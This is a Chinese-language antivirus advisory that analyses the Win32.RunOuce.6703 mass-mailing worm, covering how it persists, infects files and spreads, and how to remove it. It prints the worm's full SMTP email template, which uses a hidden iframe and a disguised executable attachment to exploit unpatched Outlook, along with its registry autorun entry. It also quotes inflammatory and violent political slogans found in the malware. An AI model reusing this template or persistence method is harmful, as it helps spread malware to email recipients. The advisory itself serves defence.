病毒名称：Win32.RunOuce.6703

　　Win32.RunOuce.6703病毒通过进入计算机，利用IE安全系统的IFRAME漏洞进行攻击。它能通过Email传播，并且可以感染文件。

　　病毒类型：蠕虫

　　威胁评估：

　　范围程度：中

　　危害水平：中

　　传播速度：高

　　技术特征：

　　1、病毒运行后，会：

　　a.将自身拷贝到%System%目录下取名为RunOuce.exe。(注：%System%是可变的，该病毒会自动查找Windows系统目录，缺省情况下是 C:WindowsSystem) 并将自身拷贝到那里。

　　b.病毒先在注册表项HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加：RunOuce %System%RunOuce.exe

　　这样使用者启动系统时病毒就会自动运行。

　　c.会感染后缀为EXE和SCR的PE可执行文件，且病毒代码中还带有部分调试信息，如INT 3。

　　d.通过电子邮件传播

　　该病毒会搜索Windows地址簿的邮件地址，然后将自己作为邮件的附件向这些邮件地址发送。邮件的主题是“Hi,i am %s”,%s是中毒者的计算机名字，附件名为P.EXE，邮件源地址（From：XXX@hotmail.com）

　　以下是中国黑客病毒发送病毒邮件的邮件模板

　　HELO btamail.net.cn

　　MAIL FROM: iloveyou@btamail.net.cn

　　RCPT TO: %s

　　DATA

　　FROM: %s@hotmail.com

　　TO: %s

　　SUBJECT: Hi,i am %s

　　MIME-Version: 1.0

　　Content-type: multipart/mixed; boundary="#BOUNDARY#"

　　--#BOUNDARY#

　　Content-Type: text/html

　　Content-Transfer-Encoding: quoted-printable

　　<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

　　--#BOUNDARY#

　　MIME-Version: 1.0

　　Content-Type: audio/x-wav; name="p.exe"

　　Content-Transfer-Encoding: base64

　　Content-id: THE-CID

　　如果在未打升级补丁的Outlook或Outlook Express中打开病毒邮件，邮件附件会自动运行。解决该缺陷的Outlook升级补丁可在如下地址下载：http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

　　2、病毒体内含有如下信息：

　　ChineseHacker

　　枪毙李洪志！

　　去他妈的法轮功!

　　反对邪教,崇尚科学!

　　打倒本拉登!

　　向英雄王伟致意!

　　反对霸权主义!

　　社会主义好!

　　防范措施：

　　关掉并且移除不需要的服务。

　　把补丁升级到最新,如IIS和IE。

　　快速孤立感染的计算机阻止进一步扩散。

　　清除方法：

　　下载金山毒霸的“中国黑客”专杀工具或升级手中的杀毒软件，查杀。